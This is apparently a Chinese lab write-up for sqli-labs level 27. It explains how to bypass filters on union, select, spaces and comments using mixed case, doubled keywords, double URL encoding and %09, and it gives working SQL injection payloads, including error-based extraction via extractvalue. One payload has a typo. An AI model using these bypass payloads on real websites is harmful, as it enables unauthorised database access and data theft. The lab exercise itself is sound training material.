sqli-labs第二十七关——Trick with selectunion
进去之后,可以看见提示这一关新屏蔽了union 和 select,查看源码
确定:/*,--+,#,spaces,union,select,union,select的大小写均被屏蔽了
总结一下:
sql注入绕过技术
- 大小写绕过:任意字母大小写,如and→ANd / AND / anD
- 双写绕过:or→oror / oorr
- url编码(两次):
原理:.WAF(web应用防火墙)只解码一次,但后端服务器解码两次
例如:空格的url解码是%20,我们要对%20再次编码
%→%25,数字保持不变,也就是最终变成%2520(不用双重全编码(%25%32%30),这个已经足够高效并且能绕过多数WAF了)
这一关我们用大小写绕过,空格过滤用%09绕过,and与or用&&与||绕过,union改成UNIon,select改成SELEct,结尾注释符号仍然用 ||'
一:判断注入类型
输入 ?id=1' 和 ?id=1') 的时候报错
尝试闭合 ,单引号闭合成功
?id=1'||'
二:开始注入
1.爆列数
?id=1'%09oRdeR%09b,4y%091,2,3,4||'四列
2.爆回显位
?id=-1'%09UNIon%09SELEct%091,database(),3%09||'
无回显,使用报错注入
3.爆数据库名字
?id=1'%09and%09extractvalue(1,concat(0x7e,database()))||'
❀❀❀ 完结撒花!!!❀❀❀